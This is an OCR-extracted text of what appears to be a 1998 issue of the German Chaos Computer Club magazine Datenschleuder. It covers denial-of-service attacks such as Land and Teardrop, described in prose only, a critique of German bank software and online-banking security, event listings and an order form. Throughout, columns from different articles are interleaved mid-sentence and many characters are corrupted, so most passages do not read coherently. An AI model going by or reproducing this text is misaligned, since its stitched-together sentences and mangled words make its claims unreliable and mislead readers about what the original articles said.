Maschinen 'rum, die nicht gegen Teardrop Hack im Sinne der Hackerethik ist das wohl
gepatcht waren. Kusch, ab hinter die Firewall! nicht, wenn wir mal ehrlich sind.
Warum wir trotzdem einen †berblicksartikel
Land Ÿber Denial of Service fŸr diese Datenschleuder
Der letzte Schrei im DoS Bereich traf Ende geschrieben haben? Auf der Hand liegen GrŸnde
November ein: Land. Es handelt sich hierbei um wie "Information will frei sein" oder "Security
einen relativ komplexen Angriff. Dabei wird ein through obscurity funktioniert nicht" -- aber das
SYN-Paket erzeugt, bei dem EmpfŠnger- und wichtigste ist, da§ das berŸhmte Know-How bei
Absenderadresse/-port gleich sind. Das erzeugt, der ganzen Diskussion doch sehr unter zu fallen
wenn es an einen offenen Port gesendet wird, in scheint; sowohl bei den k00len Typen, die nicht
vielen IP-Stacks eine Race Condition und legt das wirklich durchschauen, was hinter ihrem
System lahm. Rundrum-sorglos-WinNuke steckt, als auch bei
Das interessante an Land war, da§ es auch der nicht-technisierten Normalbevšlkerung. Und
Cisco-Router, die an sehr vielen zentralen stellen wenn wir uns schon Ÿber fehlendes Know-How
des Netzes stehen, davon betroffen waren. Da beschweren: von dem Know-Why wollen wir gar
aber nach den StŸrmen der vorhergehenden nicht reden. Bitte kŸmmert euch umd das Know-
Monate viele Netze gegen spooÞng gesichert Why. Ihr schafft das schon.
waren, hielten sich die Auswirkungen in Grenzen.
Doobee R. Tzeck & Jens Ohlig
Fazit Chaos Computer Club Cologne
Im Prinzip sind fŸr uns nach der Betrachtung
dieser Attacken immer noch die gleichen Fragen
offen, die wir weiter oben als noch auszudiskutie-
ren bezeichnet haben. IRC oder sonstige
Vertrauen ist der Anfang von sich die Branche darin, da§ man jetzt Personal
Allem. Diesen Slogan benutzt die einstellen mu§, weil die veranschlagte Personal-
Deutsche Bank schon seit langem decke nicht ausreichend dimensioniert ist. Der
nicht mehr. Mit dem Jahr 2000 Markt fŸr qualÞziertes EDV-Personal ist aber leer-
vor der Tür und dem Euro- gefegt. Wenn eine Bank heute Bank-Software kau-
Problem vor der Nase will sich fen mšchte, bekommt sie von allen Anbietern ein
mŸdes LŠcheln und die Aussage, da§ in diesem
auch innerhalb der Deutschen
Jahr da sicher nichts mehr zu machen sei. Man
Bank nicht so recht Vertrauen wŠre schon froh, wenn man bei den grš§eren
einstellen. Stammkunden die Euro-Problematik fristgemŠ§
gelšst bekŠme. ZusŠtzlich werden die Banken
wurmzerfressenen Lochkartenstapeln"
zusammengehaltenen Datenbanken auf
jahrzehntealten BitfrŠsen sind, zu den Kunden
durchschleichen, kšnnten die GeschŠftssausichten
der GeldhŠuser deutlich sinken.
Da§ sein schwer errungenes Vermšgen
eigentlich nur noch existiert, weil die
Backupstrategien bisher nicht in grš§erem
Umfang versagt haben, ist dem normalsterblichen
HŠuslebauer schwer beizubringen. Die Banken
haben schlie§lich gelernt. Nachdem die ersten
wirklichen Probleme aufgetreten waren, haben
Schnelldrucker in den KellerrŠumen Einzug
gehalten, auf denen alle Transaktionen auf Papier
gebackupt werden. In IBMs Terminologie sind
das dann QuaternŠr-Speicher. Wie die dazugehš- Karten-Problemen umgekehrt (siehe Artikel in
rigen einhundert studentischen Datenerfassungs- dieser Ausgabe).
experten zum Wiedereintippen in IBM-Termino- Der HoffnungstrŠger der Branche, das
logie hei§en, war bisher nicht zu ermitteln. Onlinebanking, sieht auch nicht viel stressfreier
Die armen Banken sind ja auch gebeutelt. aus. HBCI ist die Antwort des ZKA zum Thema
Nachdem sie die Jahr-2000-Problematik einige "Sicherheit vom Online-Banking". Das ZKA ist
Jahre lang einfach ignoriert haben ("wir haben ja der "Zentrale Kreditausschu§", sozusagen das
noch genŸgend Zeit"), und jetzt plštzlich und PolitbŸro der Branche. Hier werden Inter-Banken-
unerwartet die Euro-Problematik auf die Banken Angelegenheiten geklŠrt.
zukam, gibt es jetzt auch noch unerwŸnschte HBCI ist der Versuch des ZKA, einen
Presseberichte zum Thema "Sicherheit des bankenunabhŠngigen Standard fŸr sichere
Onlinebankings". Mit hŠ§lichen Worten wie Online-Transaktionen zu schaffen. Von allen
"Virus" und "Trojanisches Pferd" wird doch nur technisch mit der Umsetzung von HBCI befassten
wieder Verunsicherung in die Kunden hineingere- Leuten hšrt man dazu nichts als unterdrŸckte
det, so der Branchentenor. Erstaunlich einig ist
sich die Frage, warum es in Deutschland keine vor kurzem ein Jahr-2000-Þx heraus. Das
anstŠndigen Banken aus dem Ausland gibt. Die Protokoll wird normalerweise mit 56-Bit DES
Antwort ist, da§ das deutsche Bankengesetz das verschlŸsselt. Ja, genau das 56-Bit DES, das vor
bisher auf DrŠngen der Banken hin einfach verbo- kurzem in drei Tagen geknackt wurde und das
ten hat. die US-Regierung jetzt fŸr hinreichend knackbar
Wenn man eine neue Bank anmelden mšchte, hŠlt, da§ es international fŸr den Export
dann macht die zustŠndige Behšrde die freigegeben wurde. Somit ist die Verbindung des
Zulassung von der Meinung des ZKA abhŠngig, Internet-Kunden, der sich per 128bit-SSL bei
wo ja, wie wir schon gesagt haben, die ganzen seiner Bank einwŠhlt, um die Gasrechnung zu
anderen Banken sitzen. D.h. am Ende bestimmen begleichen, rein kryptographisch um den Faktor
die anderen Banken, ob sie gerne Konkurrenz 2^72 besser geschŸtzt als die internationalen
haben mšchten oder nicht. Allerdings wird sich Millionentransfers.
das im Rahmen der EU Šndern. Die Deutsche Bank hat
Die Banken werden sich dann beispielsweise in Ihren Konto-
auf andere Weise als Monopol nummern nicht die konto-
versuchen, so wie sie jetzt fŸhrende Filiale kodiert,
schon die europŠische obwohl das ja wohl eine offen-
Niederlassung der NASDAQ, sichtliche Funktion wŠre.
die EASDAQ, boykottieren. TatsŠchlich ist es einem
Langfristig ist die Lage aller- Mitarbeiter nicht mšglich,
dings vollstŠndig aussichtslos, anhand einer Kontonummer zu
die deutsche Bank macht auch erkennen, wo er denn genau
nicht durch ihre Kunden, anrufen soll, wenn ihm die
sondern durch ihre Immo- Filiale nicht zufŠllig bekannt ist.
biliengeschŠfte Gewinne. Wer Au§erdem war die Software
an der Bšrse spekuliert, sollte nicht ßexibel genug, die Filialen
sich dringend noch vor dem im Osten und Westen
Jahre 2000 von seinen Bank- Deutschlands zusammenzu-
Aktien trennen oder deutsche fŸhren, also haben bei den
Bank-Aktien sogar shorten deutschen Gro§banken Osten
oder putten. und Westen verschiedene
Um unsere Kritik zu verstehen, mu§ man Bankleitzahlen.
einen Einblick in die grausigen Protokolle und †berhaupt zieht sich das Konzept der
Software-Datenhaufen bekommen, mit denen es DatenbankschlŸssel immer wieder durch die
der durchschnittliche Banker zu tun hat. Leider Bankensoftware. Banken identiÞziert man nicht
haben wir es an dieser Stelle mit einer Art Selbst- mit Namen, sondern mit Bankleitzahl. Aktien
verteidigungsstrategie der Banken zu tun, denn identiÞziert man nicht mit dem Namen, sondern
sie legen von ihren Protokollen und Programmen mit der Wertpapierkennnummer. Konten
gar nichts offen., ãdenn Sicherheit ist identiÞziert man nicht mit dem Namen und dem
Vertrauenssache...Ò (Werbung der TeleSec fŸr ihr Geburtstag oder sonstwas, sondern per Konto-
Trust-Center, das sie mit dem T†V zusammen nummer. Wir bestreiten nicht, da§ man
betreiben). Ein gutes Beispiel ist allerdings das DatenbankschlŸssel braucht. Aber wieso belŠstigt
SWIFT-Protokoll, mit dem Banken international man die Kunden damit, solche SchlŸssel
ihre †berweisungen abwickeln. FŸr SWIFT kam auswendig zu lernen?
fŸr die HŠlfte des Gehaltes die MŸllsoftware einer durch Hacking an interne Daten des betroffenen
Bank warten zu mŸssen. Es ist nur eine Frage der Unternehmens gelangt zu sein. Besonders die
Zeit, bis diese massive Ansammlung von ange- Drohung mit einer Veršffentlichung von Belegen
ekelten Programmierern die kritische Masse fŸr Steuerhinterziehungen zeigte schnelle
erreicht und den Banken ihre Systeme um die Wirkung. VorstŠnde von deutschen Gro§unter-
Ohren ßiegen. nehmen jetteten in Learjets durch die Welt, um
Hinzu kommt die Masse an zur Zeit einem aus einer psychatrischen Heilanstalt
entlassenen ArbeitskrŠften, denn die Banken sind entßeuchten Hochstapler fŸr einige tausend Mark
gerade in gro§em Stil dabei, sich von Mitarbeitern eine Packung Leerdisketten abzukaufen. Nach
zu trennen, und auf automatisiertes Banking ohne langwieriger Suche gelang es tatsŠchlich, eines
Beratung von mehreren
umzusteigen. dutzend erpressten
Nachdem wir einen Unternehmen zu
Einblick in den Þnden, das sich
QualitŠtsstandard sicher war, korrekt
der Banksoftware Steuern gezahlt zu
haben, liegt die haben. Auf dieser
Vermutung nahe, Grundlage war es
da§ schon ein dem Unternehmen
verŠrgerter Ex- mšglich, eine
Mitarbeiter eine Anzeige zu
Bank in den Ruin erstatten, die
treiben kšnnte, zusammen mit
wenn man ihn nur anderen Ma§nah-
kurzfristig genug men letztendlich zu
entlŠ§t. einer RŸckfŸhrung
Nick Lesson, der des Herrn
die Barrings-Bank mit seinen etwas UngerbŸhler in seine Klinik fŸhrte.
unkonventionellen Transaktionen Vor dem Hintergrund der drohenden Krisen
heruntergefahren hat, ist da nur ein Beispiel. Die Euro und Jahr-2000 ist der einzige gangbare Weg
InnentŠterquote bei Banken liegt nach diversen eine Open Source Bank. Nur durch eine
Statistiken im Bereich zwischen 70 und 80 vollstŠndige Offenlegung aller Sourcen kšnnen
Prozent. Praktisch kein Fall wird bekannt, da die die Banken den verunsicherten Kunden einen
Beteiligten nichts so sehr fŸrchten wie eine šffent- Grund fŸr ihr Vertrauen liefern. Nur so lie§e sich
liche Behandlung. Der Imageverlust fŸr die das Vertrauen in die eigene EDV dem Kunden
Banken Ÿberwiegt in praktisch allen FŠllen den gegenŸber rechtfertigen. Vertrauen ist gut,
materiellen Schaden deutlich. Kontrolle ist besser.
Bei den Au§entŠtern sieht es nicht viel besser
aus. Der Fall von Markus Sšhnke UngerbŸhler, felix@ccc.de & frank@ccc.de
der auch schon in der Datenschleuder behandelt
wurde, zeigt dies exemplarisch. UngerbŸhler gab
sich als Mitglied des Chaos Computer Club aus
und versuchte Banken, RŸstungsunternehmen
und Šhnliche mit der Behauptung zu erpressen,
Title - Sendmail
Original - Graceland
Author - N. R. "Norm" Lunde
Intro - Apologies to Paul Simon
Sendmail
Gern angefragt werden CCCler für Zeitschriftenkiosk und dem von der CDU
Vorträge und Diskussionen. Eines eingefŸhrten Tuttifrutti-Privat-TV die Zahl
der beliebtesten und zugleich mi§brauchter Kinder in den vergangenen
lästigsten Themen ist Jahrzehnten in etwa unverŠndert geblieben ist.
Kinderpornographie im Internet. Mir geht es um die mi§brauchten Kinder,
Ÿberwiegend MŠdchen. Wie kommt es zum Mi§-
brauch und wo Þndet er statt? Genau diese Frage
http://www.indocities.com/nobody/tiedge.htm
Wurstsprengungen und
Münzschrumpfungen
Basteltips nicht gerade fuer den nehmen, da diese auf die Anzahl real
Kindergeburtstag Þnden sich auf der Webpage existierender Koerperteile dekrementierend
von ßeischwulf. Doch braucht es etwas, bis die wirken koennten. FŸr den Rest frei nach dem
Seiten geladen sind, weil er selbst bithaftig bunt Motto "survival of the Þttest" ein Wunsch:
erscheint. Die MŸnzbilder entschŠdigen fŸr die Bitte sendet Erfahrungsberichte an die
Wartezeit. Es Þnden sich Basteltips aller Art frei Redaktion Datenschleuder, ds@ccc.de Anfragen
nach dem Motto "mit Kanonen auf Spatzen und Beschwerden werden ignoriert, Erfahrungen
schie§en". Anders gelingt es kaum, ausgewertet. Wie hei§t es in gewissen
MŸnzschrumpfungen durchzufŸhren oder jugendgefŠhrdenden TV-Serien: ENERGIE!
Wurstsprengungen. http://www.geocities.com/CapeCanaveral/Hanga
Wer eine in der Natur hŠuÞg vorkommende r/9561/
Bedingung erfŸllt und zwei linke HŠnde hat,
sollte von derartigen Experimenten Abstand
4.10.98
Public Domain #89
„Club of Rome“
Ein Blick zurück in die Zukunft. Mit Uwe Möller,
Vorstandsvorsitzender des deutschen Club of Rome.
Details & Anfahrtsbeschreibung siehe
http://www.foebud.org/pd/index.html
Ja!
Auch diesen Dezember wird es wieder einen
Chaos Communication Congress geben. Und
1.11.1998 zwar schon den FŸnfzehnten!
Allerdings wird der Congress dieses Jahr
Public Domain #90 NICHT wieder im Eidelstedter BŸrgerhaus
„Wo bin ich? GPS“ stattÞnden.
Aus dem neuen Veranstaltungsort machen wir
Ralph Schraven berichtet über Funktionsweise und aber noch eine kleine Weile ein Geheimnis bis alle
Anwendungen der Standortbestimmung mittels Global Details ausgearbeitet sind.
Positioning System (GPS). Aktuelle Informationen zum Congress Þndet
Details & Anfahrtsbeschreibung siehe Ihr auf unserer Web Site unter
http://www.foebud.org/pd/index.html http://www.ccc.de/congress98.
Wir hoffen natŸrlich auch dieses Jahr wieder
auf rege Beteiligung auf unter hinter dem
Podium.
6.12.1998
Public Domain #91
„Datenschutzgebiete auf der roten
Liste?“ 15. chaos
communication
Dr. Klaus Brunnstein über Datenspuren im Netz.
Details & Anfahrtsbeschreibung siehe congress
http://www.foebud.org/pd/index.html
(DM 5,00 in Briefmarken) _____ DM 5,00 Doku zum Tod des „KGB“-Hackers Karl Koch
_____ DM 25,00 Congressdokumentation CCC ‘93
D-20255 Hamburg
Herbst 1998
Postbank Hamburg, BLZ 200 100 20 PC-DES Verschlüsselung
_____ DM 5,00 1 Bogen „Chaos im Äther“
Der Mitgliedsfetzen
Der Bestellfetzen
Unterschrift ________________________________________ _____ Gesamtbetrag
Die Kohle liegt